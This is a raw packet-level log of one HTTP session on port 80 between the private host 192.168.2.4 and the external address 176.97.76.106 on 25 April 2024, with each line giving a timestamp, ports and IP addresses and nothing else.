Apr 25, 2024 09:04:02.265685081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265697956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265707016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265721083 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265743017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265743971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265777111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265793085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265808105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265820026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265863895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265881062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265904903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265933037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265954018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.265955925 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.265991926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266022921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266089916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266091108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266133070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266135931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266144991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266186953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266207933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266207933 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266232967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266235113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266277075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266288996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266302109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266326904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266331911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266376019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266376019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266382933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266411066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266427040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266452074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266454935 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266489029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266493082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266546011 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266597033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266635895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266644001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266705990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266719103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266757011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266772032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266772032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266779900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266841888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266845942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266845942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266900063 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.266911983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266947985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266961098 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.266983032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267004967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267015934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267077923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267124891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267124891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267157078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267214060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267226934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267251968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267266035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267321110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267335892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267349958 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267394066 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267410994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267477989 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267477989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267573118 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267582893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267608881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267621994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267643929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267651081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267651081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267682076 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267705917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267725945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267776012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267781019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267787933 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267818928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267832041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267844915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267872095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267904997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267908096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.267956018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.267987967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268001080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268069983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268080950 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268081903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268115044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268124104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268136978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268145084 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268182993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268204927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268218040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268229961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268270016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268270016 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268273115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268285990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268304110 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268337011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268338919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268388987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268448114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268455029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268488884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268501043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268501043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268513918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268558979 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268610001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268621922 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268647909 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268667936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268707991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268708944 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268729925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268743038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268765926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268795013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268816948 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268858910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268873930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268897057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.268904924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268954039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268954039 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.268958092 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269009113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269016981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269100904 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269109964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269123077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269165993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269170046 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269177914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269198895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269210100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269268990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269269943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269280910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269309044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269340038 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269377947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269391060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269392967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269452095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269454956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269468069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269524097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269525051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269546032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269560099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269562006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269625902 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269648075 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269679070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269697905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269704103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269737959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269737959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269737959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269785881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269792080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269814968 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269831896 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269845963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269881964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269881964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.269915104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269927025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.269958019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270041943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270086050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270133972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270153999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270165920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270185947 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270222902 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270251989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270263910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270323992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270343065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270343065 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270365953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270366907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270407915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270414114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270452976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270468950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270548105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270566940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270596981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270610094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270622015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270656109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270673990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270694971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270730019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270730019 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270750999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.270817041 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.270953894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271009922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271017075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271061897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271115065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271156073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271189928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271208048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271219969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271256924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271270990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271310091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271343946 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271344900 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271359921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271452904 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271507978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271549940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271553040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271575928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271630049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271630049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271641016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271687031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271694899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271838903 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.271928072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271964073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271979094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.271996021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272017956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272027016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272043943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272047043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272069931 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272082090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272118092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272118092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272126913 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272160053 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272187948 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272205114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272205114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272227049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272241116 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272281885 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272303104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272353888 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272367954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272372961 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272425890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272425890 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272433996 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272464991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272485018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272505045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272521973 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272552967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272557974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272612095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272644043 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272664070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272699118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272699118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272707939 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272746086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272761106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272779942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272799015 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272825956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272839069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272861004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.272911072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272911072 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.272948980 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273000002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273004055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273044109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273051977 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273089886 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273119926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273144007 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273174047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273194075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273217916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273217916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273245096 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273266077 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273273945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273319006 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273349047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273386955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273428917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273441076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273467064 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273489952 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273497105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273544073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273555994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273600101 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273633003 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273658991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273708105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273716927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273727894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273792982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273808002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273808002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273888111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273904085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273916006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273927927 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.273953915 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273982048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:02.273987055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:02.274056911 CEST	80	49733	176.97.76.106	192.168.2.4
